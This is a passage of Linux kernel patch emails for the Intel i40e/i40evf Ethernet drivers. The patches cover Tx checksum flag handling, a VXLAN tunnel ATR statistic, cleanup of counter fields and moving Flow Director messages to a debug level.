int i40e_tsyn(struct i40e_ring *tx_ring, struct sk_buff *skb, /** * i40e_tx_enable_csum - Enable Tx checksum offloads * @skb: send buffer - * @tx_flags: Tx flags currently set + * @tx_flags: pointer to Tx flags currently set * @td_cmd: Tx descriptor command bits to set * @td_offset: Tx descriptor header offsets to set * @cd_tunneling: ptr to context desc bits **/ -static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, +static void i40e_tx_enable_csum(struct sk_buff *skb, u32 *tx_flags, u32 *td_cmd, u32 *td_offset, struct i40e_ring *tx_ring, u32 *cd_tunneling) @@ -2239,6 +2250,7 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, switch (ip_hdr(skb)->protocol) { case IPPROTO_UDP: l4_tunnel = I40E_TXD_CTX_UDP_TUNNELING; + *tx_flags |= I40E_TX_FLAGS_VXLAN_TUNNEL; break; default: return; @@ -2248,18 +2260,17 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, this_ipv6_hdr = inner_ipv6_hdr(skb); this_tcp_hdrlen = inner_tcp_hdrlen(skb); - if (tx_flags & I40E_TX_FLAGS_IPV4) { - - if (tx_flags & I40E_TX_FLAGS_TSO) { + if (*tx_flags & I40E_TX_FLAGS_IPV4) { + if (*tx_flags & I40E_TX_FLAGS_TSO) { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV4; ip_hdr(skb)->check = 0; } else { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV4_NO_CSUM; } - } else if (tx_flags & I40E_TX_FLAGS_IPV6) { + } else if (*tx_flags & I40E_TX_FLAGS_IPV6) { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV6; - if (tx_flags & I40E_TX_FLAGS_TSO) + if (*tx_flags & I40E_TX_FLAGS_TSO) ip_hdr(skb)->check = 0; } @@ -2271,8 +2282,8 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, skb_transport_offset(skb)) >> 1) << I40E_TXD_CTX_QW0_NATLEN_SHIFT; if (this_ip_hdr->version == 6) { - tx_flags &= ~I40E_TX_FLAGS_IPV4; - tx_flags |= I40E_TX_FLAGS_IPV6; + *tx_flags &= ~I40E_TX_FLAGS_IPV4; + *tx_flags |= I40E_TX_FLAGS_IPV6; } } else { network_hdr_len = skb_network_header_len(skb); @@ -2282,12 +2293,12 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, } /* Enable IP checksum offloads */ - if (tx_flags & I40E_TX_FLAGS_IPV4) { + if (*tx_flags & I40E_TX_FLAGS_IPV4) { l4_hdr = this_ip_hdr->protocol; /* the stack computes the IP header already, the only time we * need the hardware to recompute it is in the case of TSO. 
*/ - if (tx_flags & I40E_TX_FLAGS_TSO) { + if (*tx_flags & I40E_TX_FLAGS_TSO) { *td_cmd |= I40E_TX_DESC_CMD_IIPT_IPV4_CSUM; this_ip_hdr->check = 0; } else { @@ -2296,7 +2307,7 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, /* Now set the td_offset for IP header length */ *td_offset = (network_hdr_len >> 2) << I40E_TX_DESC_LENGTH_IPLEN_SHIFT; - } else if (tx_flags & I40E_TX_FLAGS_IPV6) { + } else if (*tx_flags & I40E_TX_FLAGS_IPV6) { l4_hdr = this_ipv6_hdr->nexthdr; *td_cmd |= I40E_TX_DESC_CMD_IIPT_IPV6; /* Now set the td_offset for IP header length */ @@ -2709,7 +2720,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, else if (protocol == htons(ETH_P_IPV6)) tx_flags |= I40E_TX_FLAGS_IPV6; - tso = i40e_tso(tx_ring, skb, tx_flags, protocol, &hdr_len, + tso = i40e_tso(tx_ring, skb, &hdr_len, &cd_type_cmd_tso_mss, &cd_tunneling); if (tso < 0) @@ -2735,7 +2746,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, if (skb->ip_summed == CHECKSUM_PARTIAL) { tx_flags |= I40E_TX_FLAGS_CSUM; - i40e_tx_enable_csum(skb, tx_flags, &td_cmd, &td_offset, + i40e_tx_enable_csum(skb, &tx_flags, &td_cmd, &td_offset, tx_ring, &cd_tunneling); } diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.h b/drivers/net/ethernet/intel/i40e/i40e_txrx.h index 4b0b8102cdc3..ea1df3b48747 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.h +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.h @@ -139,6 +139,7 @@ enum i40e_dyn_idx_t { #define I40E_TX_FLAGS_FSO (u32)(1 << 7) #define I40E_TX_FLAGS_TSYN (u32)(1 << 8) #define I40E_TX_FLAGS_FD_SB (u32)(1 << 9) +#define I40E_TX_FLAGS_VXLAN_TUNNEL (u32)(1 << 10) #define I40E_TX_FLAGS_VLAN_MASK 0xffff0000 #define I40E_TX_FLAGS_VLAN_PRIO_MASK 0xe0000000 #define I40E_TX_FLAGS_VLAN_PRIO_SHIFT 29 diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index 3ef23091439f..09cc2d750a81 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -1406,16 +1406,14 @@ static int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, * i40e_tso - set up the tso context descriptor * @tx_ring: ptr to the ring to send * @skb: ptr to the skb we're sending - * @tx_flags: the collected send information - * @protocol: the send protocol * @hdr_len: ptr to the size of the packet header * @cd_tunneling: ptr to context descriptor bits * * Returns 0 if no TSO can happen, 1 if tso is going, or error **/ static int i40e_tso(struct i40e_ring *tx_ring, struct sk_buff *skb, - u32 tx_flags, __be16 protocol, u8 *hdr_len, - u64 *cd_type_cmd_tso_mss, u32 *cd_tunneling) + u8 *hdr_len, u64 *cd_type_cmd_tso_mss, + u32 *cd_tunneling) { u32 cd_cmd, cd_tso_len, cd_mss; struct ipv6hdr *ipv6h; @@ -1466,12 +1464,12 @@ static int i40e_tso(struct i40e_ring *tx_ring, struct sk_buff *skb, /** * i40e_tx_enable_csum - Enable Tx checksum offloads * @skb: send buffer - * @tx_flags: Tx flags currently set + * @tx_flags: pointer to Tx flags currently set * @td_cmd: Tx descriptor command bits to set * @td_offset: Tx descriptor header offsets to set * @cd_tunneling: ptr to context desc bits **/ -static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, +static void i40e_tx_enable_csum(struct sk_buff *skb, u32 *tx_flags, u32 *td_cmd, u32 *td_offset, struct i40e_ring *tx_ring, u32 *cd_tunneling) @@ -1487,6 +1485,7 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, switch (ip_hdr(skb)->protocol) { case IPPROTO_UDP: l4_tunnel = I40E_TXD_CTX_UDP_TUNNELING; + 
*tx_flags |= I40E_TX_FLAGS_VXLAN_TUNNEL; break; default: return; @@ -1496,18 +1495,17 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, this_ipv6_hdr = inner_ipv6_hdr(skb); this_tcp_hdrlen = inner_tcp_hdrlen(skb); - if (tx_flags & I40E_TX_FLAGS_IPV4) { - - if (tx_flags & I40E_TX_FLAGS_TSO) { + if (*tx_flags & I40E_TX_FLAGS_IPV4) { + if (*tx_flags & I40E_TX_FLAGS_TSO) { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV4; ip_hdr(skb)->check = 0; } else { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV4_NO_CSUM; } - } else if (tx_flags & I40E_TX_FLAGS_IPV6) { + } else if (*tx_flags & I40E_TX_FLAGS_IPV6) { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV6; - if (tx_flags & I40E_TX_FLAGS_TSO) + if (*tx_flags & I40E_TX_FLAGS_TSO) ip_hdr(skb)->check = 0; } @@ -1519,8 +1517,8 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, skb_transport_offset(skb)) >> 1) << I40E_TXD_CTX_QW0_NATLEN_SHIFT; if (this_ip_hdr->version == 6) { - tx_flags &= ~I40E_TX_FLAGS_IPV4; - tx_flags |= I40E_TX_FLAGS_IPV6; + *tx_flags &= ~I40E_TX_FLAGS_IPV4; + *tx_flags |= I40E_TX_FLAGS_IPV6; } @@ -1532,12 +1530,12 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, } /* Enable IP checksum offloads */ - if (tx_flags & I40E_TX_FLAGS_IPV4) { + if (*tx_flags & I40E_TX_FLAGS_IPV4) { l4_hdr = this_ip_hdr->protocol; /* the stack computes the IP header already, the only time we * need the hardware to recompute it is in the case of TSO. */ - if (tx_flags & I40E_TX_FLAGS_TSO) { + if (*tx_flags & I40E_TX_FLAGS_TSO) { *td_cmd |= I40E_TX_DESC_CMD_IIPT_IPV4_CSUM; this_ip_hdr->check = 0; } else { @@ -1546,7 +1544,7 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, /* Now set the td_offset for IP header length */ *td_offset = (network_hdr_len >> 2) << I40E_TX_DESC_LENGTH_IPLEN_SHIFT; - } else if (tx_flags & I40E_TX_FLAGS_IPV6) { + } else if (*tx_flags & I40E_TX_FLAGS_IPV6) { l4_hdr = this_ipv6_hdr->nexthdr; *td_cmd |= I40E_TX_DESC_CMD_IIPT_IPV6; /* Now set the td_offset for IP header length */ @@ -1940,7 +1938,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, else if (protocol == htons(ETH_P_IPV6)) tx_flags |= I40E_TX_FLAGS_IPV6; - tso = i40e_tso(tx_ring, skb, tx_flags, protocol, &hdr_len, + tso = i40e_tso(tx_ring, skb, &hdr_len, &cd_type_cmd_tso_mss, &cd_tunneling); if (tso < 0) @@ -1961,7 +1959,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, if (skb->ip_summed == CHECKSUM_PARTIAL) { tx_flags |= I40E_TX_FLAGS_CSUM; - i40e_tx_enable_csum(skb, tx_flags, &td_cmd, &td_offset, + i40e_tx_enable_csum(skb, &tx_flags, &td_cmd, &td_offset, tx_ring, &cd_tunneling); } diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.h b/drivers/net/ethernet/intel/i40evf/i40e_txrx.h index 1e49bb1fbac1..a23f5e862f06 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.h +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.h @@ -138,6 +138,7 @@ enum i40e_dyn_idx_t { #define I40E_TX_FLAGS_FCCRC (u32)(1 << 6) #define I40E_TX_FLAGS_FSO (u32)(1 << 7) #define I40E_TX_FLAGS_FD_SB (u32)(1 << 9) +#define I40E_TX_FLAGS_VXLAN_TUNNEL (u32)(1 << 10) #define I40E_TX_FLAGS_VLAN_MASK 0xffff0000 #define I40E_TX_FLAGS_VLAN_PRIO_MASK 0xe0000000 #define I40E_TX_FLAGS_VLAN_PRIO_SHIFT 29 From 60ccd45cbabdc058061b860c43c48877558cc176 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Thu, 16 Apr 2015 20:06:01 -0400 Subject: [PATCH 399/872] i40e/i40evf: Add stats to count Tunnel ATR hits Add a 3rd dynamic filter counter to track Tunneled ATR hits separately. 
Ethtool port stat "fdir_atr_tunnel_match" Change-ID: Idd978b6db2a462b5722397cd2ffd04ef055f8655 Signed-off-by: Anjali Singhai Jain Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e.h | 3 +++ drivers/net/ethernet/intel/i40e/i40e_ethtool.c | 1 + drivers/net/ethernet/intel/i40e/i40e_main.c | 4 ++++ drivers/net/ethernet/intel/i40e/i40e_txrx.c | 13 ++++++++++--- drivers/net/ethernet/intel/i40e/i40e_type.h | 1 + drivers/net/ethernet/intel/i40evf/i40e_type.h | 1 + 6 files changed, 20 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h index 33c35d3b7420..0bfa5a05fab1 100644 --- a/drivers/net/ethernet/intel/i40e/i40e.h +++ b/drivers/net/ethernet/intel/i40e/i40e.h @@ -182,6 +182,7 @@ struct i40e_lump_tracking { enum i40e_fd_stat_idx { I40E_FD_STAT_ATR, I40E_FD_STAT_SB, + I40E_FD_STAT_ATR_TUNNEL, I40E_FD_STAT_PF_COUNT }; #define I40E_FD_STAT_PF_IDX(pf_id) ((pf_id) * I40E_FD_STAT_PF_COUNT) @@ -189,6 +190,8 @@ enum i40e_fd_stat_idx { (I40E_FD_STAT_PF_IDX(pf_id) + I40E_FD_STAT_ATR) #define I40E_FD_SB_STAT_IDX(pf_id) \ (I40E_FD_STAT_PF_IDX(pf_id) + I40E_FD_STAT_SB) +#define I40E_FD_ATR_TUNNEL_STAT_IDX(pf_id) \ + (I40E_FD_STAT_PF_IDX(pf_id) + I40E_FD_STAT_ATR_TUNNEL) struct i40e_fdir_filter { struct hlist_node fdir_node; diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c index e77b6bddd90e..c568c901453e 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c +++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c @@ -147,6 +147,7 @@ static struct i40e_stats i40e_gstrings_stats[] = { I40E_PF_STAT("rx_hwtstamp_cleared", rx_hwtstamp_cleared), I40E_PF_STAT("fdir_flush_cnt", fd_flush_cnt), I40E_PF_STAT("fdir_atr_match", stats.fd_atr_match), + I40E_PF_STAT("fdir_atr_tunnel_match", stats.fd_atr_tunnel_match), I40E_PF_STAT("fdir_sb_match", stats.fd_sb_match), /* LPI stats */ diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index f1a8c4c1e389..e70a616bb658 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -1102,6 +1102,10 @@ static void i40e_update_pf_stats(struct i40e_pf *pf) i40e_stat_update32(hw, I40E_GLQF_PCNT(pf->fd_sb_cnt_idx), pf->stat_offsets_loaded, &osd->fd_sb_match, &nsd->fd_sb_match); + i40e_stat_update32(hw, + I40E_GLQF_PCNT(I40E_FD_ATR_TUNNEL_STAT_IDX(pf->hw.pf_id)), + pf->stat_offsets_loaded, + &osd->fd_atr_tunnel_match, &nsd->fd_atr_tunnel_match); val = rd32(hw, I40E_PRTPM_EEE_STAT); nsd->tx_lpi_status = diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 8565495b8680..fc4ec82caf1f 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -2033,9 +2033,16 @@ static void i40e_atr(struct i40e_ring *tx_ring, struct sk_buff *skb, I40E_TXD_FLTR_QW1_FD_STATUS_SHIFT; dtype_cmd |= I40E_TXD_FLTR_QW1_CNT_ENA_MASK; - dtype_cmd |= - ((u32)pf->fd_atr_cnt_idx << I40E_TXD_FLTR_QW1_CNTINDEX_SHIFT) & - I40E_TXD_FLTR_QW1_CNTINDEX_MASK; + if (!(tx_flags & I40E_TX_FLAGS_VXLAN_TUNNEL)) + dtype_cmd |= + ((u32)I40E_FD_ATR_STAT_IDX(pf->hw.pf_id) << + I40E_TXD_FLTR_QW1_CNTINDEX_SHIFT) & + I40E_TXD_FLTR_QW1_CNTINDEX_MASK; + else + dtype_cmd |= + ((u32)I40E_FD_ATR_TUNNEL_STAT_IDX(pf->hw.pf_id) << + I40E_TXD_FLTR_QW1_CNTINDEX_SHIFT) & + I40E_TXD_FLTR_QW1_CNTINDEX_MASK; fdir_desc->qindex_flex_ptype_vsi = cpu_to_le32(flex_ptype); 
fdir_desc->rsvd = cpu_to_le32(0); diff --git a/drivers/net/ethernet/intel/i40e/i40e_type.h b/drivers/net/ethernet/intel/i40e/i40e_type.h index 568e855da0f3..9a5a75b1e2bc 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_type.h +++ b/drivers/net/ethernet/intel/i40e/i40e_type.h @@ -1133,6 +1133,7 @@ struct i40e_hw_port_stats { /* flow director stats */ u64 fd_atr_match; u64 fd_sb_match; + u64 fd_atr_tunnel_match; /* EEE LPI */ u32 tx_lpi_status; u32 rx_lpi_status; diff --git a/drivers/net/ethernet/intel/i40evf/i40e_type.h b/drivers/net/ethernet/intel/i40evf/i40e_type.h index ec9d83a93379..c463ec41579c 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_type.h +++ b/drivers/net/ethernet/intel/i40evf/i40e_type.h @@ -1108,6 +1108,7 @@ struct i40e_hw_port_stats { /* flow director stats */ u64 fd_atr_match; u64 fd_sb_match; + u64 fd_atr_tunnel_match; /* EEE LPI */ u32 tx_lpi_status; u32 rx_lpi_status; From 0bf4b1b0c3fda4dd72910cba3c40b3273a2de756 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Thu, 16 Apr 2015 20:06:02 -0400 Subject: [PATCH 400/872] i40e: Remove unnecessary pf members We can use the stat index macro directly, a variable is not required. Change-ID: I19f08ac16353dc0cd87a1a8248d714e15a54aa8a Signed-off-by: Anjali Singhai Jain Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e.h | 2 -- drivers/net/ethernet/intel/i40e/i40e_ethtool.c | 2 +- drivers/net/ethernet/intel/i40e/i40e_main.c | 10 ++++------ 3 files changed, 5 insertions(+), 9 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h index 0bfa5a05fab1..aca9cef50d81 100644 --- a/drivers/net/ethernet/intel/i40e/i40e.h +++ b/drivers/net/ethernet/intel/i40e/i40e.h @@ -266,8 +266,6 @@ struct i40e_pf { struct hlist_head fdir_filter_list; u16 fdir_pf_active_filters; - u16 fd_sb_cnt_idx; - u16 fd_atr_cnt_idx; unsigned long fd_flush_timestamp; u32 fd_flush_cnt; u32 fd_add_err; diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c index c568c901453e..9a68c65b17ea 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c +++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c @@ -2293,7 +2293,7 @@ static int i40e_add_fdir_ethtool(struct i40e_vsi *vsi, input->pctype = 0; input->dest_vsi = vsi->id; input->fd_status = I40E_FILTER_PROGRAM_DESC_FD_STATUS_FD_ID; - input->cnt_index = pf->fd_sb_cnt_idx; + input->cnt_index = I40E_FD_SB_STAT_IDX(pf->hw.pf_id); input->flow_type = fsp->flow_type; input->ip4_proto = fsp->h_u.usr_ip4_spec.proto; diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index e70a616bb658..6f16f56a3f27 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -1096,10 +1096,12 @@ static void i40e_update_pf_stats(struct i40e_pf *pf) &osd->rx_jabber, &nsd->rx_jabber); /* FDIR stats */ - i40e_stat_update32(hw, I40E_GLQF_PCNT(pf->fd_atr_cnt_idx), + i40e_stat_update32(hw, + I40E_GLQF_PCNT(I40E_FD_ATR_STAT_IDX(pf->hw.pf_id)), pf->stat_offsets_loaded, &osd->fd_atr_match, &nsd->fd_atr_match); - i40e_stat_update32(hw, I40E_GLQF_PCNT(pf->fd_sb_cnt_idx), + i40e_stat_update32(hw, + I40E_GLQF_PCNT(I40E_FD_SB_STAT_IDX(pf->hw.pf_id)), pf->stat_offsets_loaded, &osd->fd_sb_match, &nsd->fd_sb_match); i40e_stat_update32(hw, @@ -7679,12 +7681,8 @@ static int i40e_sw_init(struct i40e_pf *pf) (pf->hw.func_caps.fd_filters_best_effort > 0)) { pf->flags |= I40E_FLAG_FD_ATR_ENABLED; pf->atr_sample_rate 
= I40E_DEFAULT_ATR_SAMPLE_RATE; - /* Setup a counter for fd_atr per PF */ - pf->fd_atr_cnt_idx = I40E_FD_ATR_STAT_IDX(pf->hw.pf_id); if (!(pf->flags & I40E_FLAG_MFP_ENABLED)) { pf->flags |= I40E_FLAG_FD_SB_ENABLED; - /* Setup a counter for fd_sb per PF */ - pf->fd_sb_cnt_idx = I40E_FD_SB_STAT_IDX(pf->hw.pf_id); } else { dev_info(&pf->pdev->dev, "Flow Director Sideband mode Disabled in MFP mode\n"); From 6b02a174c1542486eeaa1de94e6c38e9271b89d8 Mon Sep 17 00:00:00 2001 From: Greg Rose Date: Thu, 16 Apr 2015 20:06:03 -0400 Subject: [PATCH 401/872] i40e/i40evf: Remove unneeded TODO There's no need for a counter so remove the TODO comment. Change-ID: I3321dda04934c4f5fda9b279ab666192bda44214 Signed-off-by: Greg Rose Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_txrx.c | 3 --- drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 3 --- 2 files changed, 6 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index fc4ec82caf1f..78ab8b5b25aa 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -1653,9 +1653,6 @@ static int i40e_clean_rx_irq_ps(struct i40e_ring *rx_ring, int budget) /* ERR_MASK will only have valid bits if EOP set */ if (unlikely(rx_error & (1 << I40E_RX_DESC_ERROR_RXE_SHIFT))) { dev_kfree_skb_any(skb); - /* TODO: shouldn't we increment a counter indicating the - * drop? - */ continue; } diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index 09cc2d750a81..1c79a0801d94 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -1128,9 +1128,6 @@ static int i40e_clean_rx_irq_ps(struct i40e_ring *rx_ring, int budget) /* ERR_MASK will only have valid bits if EOP set */ if (unlikely(rx_error & (1 << I40E_RX_DESC_ERROR_RXE_SHIFT))) { dev_kfree_skb_any(skb); - /* TODO: shouldn't we increment a counter indicating the - * drop? - */ continue; } From 41837cad54fe22d29f021f6cb0e9d151acb104a0 Mon Sep 17 00:00:00 2001 From: Vasu Dev Date: Thu, 16 Apr 2015 20:06:05 -0400 Subject: [PATCH 402/872] i40e: fix unrecognized FCOE EOF case Because i40e_fcoe_ctxt_eof should never be called without i40e_fcoe_eof_is_supported being called first, the EOF in fcoe_ctxt_eof should always be valid and therefore we do not need to print an error if it is not valid. However, a WARN ON to easily catch any calls to i40e_fcoe_ctxt_eof that aren't preceded with a call to i40e_fcoe_eof_is_supported is helpful. Change-ID: I3b536b1981ec0bce80576a74440b7dea3908bdb9 Signed-off-by: Vasu Dev Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_fcoe.c | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_fcoe.c b/drivers/net/ethernet/intel/i40e/i40e_fcoe.c index 1803afeef23e..c8b621e0e7cd 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_fcoe.c +++ b/drivers/net/ethernet/intel/i40e/i40e_fcoe.c @@ -118,7 +118,7 @@ static inline int i40e_fcoe_fc_eof(struct sk_buff *skb, u8 *eof) * * The FC EOF is converted to the value understood by HW for descriptor * programming. Never call this w/o calling i40e_fcoe_eof_is_supported() - * first. + * first and that already checks for all supported valid eof values. 
**/ static inline u32 i40e_fcoe_ctxt_eof(u8 eof) { @@ -132,9 +132,12 @@ static inline u32 i40e_fcoe_ctxt_eof(u8 eof) case FC_EOF_A: return I40E_TX_DESC_CMD_L4T_EOFT_EOF_A; default: - /* FIXME: still returns 0 */ - pr_err("Unrecognized EOF %x\n", eof); - return 0; + /* Supported valid eof shall be already checked by + * calling i40e_fcoe_eof_is_supported() first, + * therefore this default case shall never hit. + */ + WARN_ON(1); + return -EINVAL; } } From 2e4875e38c288702c2002c7bcf527d8aa0083979 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Thu, 16 Apr 2015 20:06:06 -0400 Subject: [PATCH 403/872] i40e: Move the FD ATR/SB messages to a higher debug level These are not useful unless SV is happening as there is a FD flush counter that tracks this. Change-ID: If2655b5a29687247d03a51d35f69854bbeb711ce Signed-off-by: Anjali Singhai Jain Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_main.c | 18 ++++++++++++------ drivers/net/ethernet/intel/i40e/i40e_txrx.c | 9 ++++++--- 2 files changed, 18 insertions(+), 9 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index 6f16f56a3f27..d6113e3d76f2 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -4744,7 +4744,8 @@ static int i40e_up_complete(struct i40e_vsi *vsi) pf->fd_add_err = pf->fd_atr_cnt = 0; if (pf->fd_tcp_rule > 0) { pf->flags &= ~I40E_FLAG_FD_ATR_ENABLED; - dev_info(&pf->pdev->dev, "Forcing ATR off, sideband rules for TCP/IPv4 exist\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "Forcing ATR off, sideband rules for TCP/IPv4 exist\n"); pf->fd_tcp_rule = 0; } i40e_fdir_filter_restore(vsi); @@ -5433,7 +5434,8 @@ void i40e_fdir_check_and_reenable(struct i40e_pf *pf) if ((pf->flags & I40E_FLAG_FD_SB_ENABLED) && (pf->auto_disable_flags & I40E_FLAG_FD_SB_ENABLED)) { pf->auto_disable_flags &= ~I40E_FLAG_FD_SB_ENABLED; - dev_info(&pf->pdev->dev, "FD Sideband/ntuple is being enabled since we have space in the table now\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "FD Sideband/ntuple is being enabled since we have space in the table now\n"); } } /* Wait for some more space to be available to turn on ATR */ @@ -5441,7 +5443,8 @@ void i40e_fdir_check_and_reenable(struct i40e_pf *pf) if ((pf->flags & I40E_FLAG_FD_ATR_ENABLED) && (pf->auto_disable_flags & I40E_FLAG_FD_ATR_ENABLED)) { pf->auto_disable_flags &= ~I40E_FLAG_FD_ATR_ENABLED; - dev_info(&pf->pdev->dev, "ATR is being enabled since we have space in the table now\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "ATR is being enabled since we have space in the table now\n"); } } } @@ -5474,7 +5477,8 @@ static void i40e_fdir_flush_and_replay(struct i40e_pf *pf) if (!(time_after(jiffies, min_flush_time)) && (fd_room < I40E_FDIR_BUFFER_HEAD_ROOM_FOR_ATR)) { - dev_info(&pf->pdev->dev, "ATR disabled, not enough FD filter space.\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "ATR disabled, not enough FD filter space.\n"); disable_atr = true; } @@ -5501,7 +5505,8 @@ static void i40e_fdir_flush_and_replay(struct i40e_pf *pf) if (!disable_atr) pf->flags |= I40E_FLAG_FD_ATR_ENABLED; clear_bit(__I40E_FD_FLUSH_REQUESTED, &pf->state); - dev_info(&pf->pdev->dev, "FD Filter table flushed and FD-SB replayed.\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "FD Filter table flushed and FD-SB replayed.\n"); } } } @@ 
-7772,7 +7777,8 @@ bool i40e_set_ntuple(struct i40e_pf *pf, netdev_features_t features) pf->fd_add_err = pf->fd_atr_cnt = pf->fd_tcp_rule = 0; pf->fdir_pf_active_filters = 0; pf->flags |= I40E_FLAG_FD_ATR_ENABLED; - dev_info(&pf->pdev->dev, "ATR re-enabled.\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "ATR re-enabled.\n"); /* if ATR was auto disabled it can be re-enabled. */ if ((pf->flags & I40E_FLAG_FD_ATR_ENABLED) && (pf->auto_disable_flags & I40E_FLAG_FD_ATR_ENABLED)) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 78ab8b5b25aa..3414e468bb51 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -283,7 +283,8 @@ static int i40e_add_del_fdir_tcpv4(struct i40e_vsi *vsi, if (add) { pf->fd_tcp_rule++; if (pf->flags & I40E_FLAG_FD_ATR_ENABLED) { - dev_info(&pf->pdev->dev, "Forcing ATR off, sideband rules for TCP/IPv4 flow being applied\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "Forcing ATR off, sideband rules for TCP/IPv4 flow being applied\n"); pf->flags &= ~I40E_FLAG_FD_ATR_ENABLED; } } else { @@ -291,7 +292,8 @@ static int i40e_add_del_fdir_tcpv4(struct i40e_vsi *vsi, (pf->fd_tcp_rule - 1) : 0; if (pf->fd_tcp_rule == 0) { pf->flags |= I40E_FLAG_FD_ATR_ENABLED; - dev_info(&pf->pdev->dev, "ATR re-enabled due to 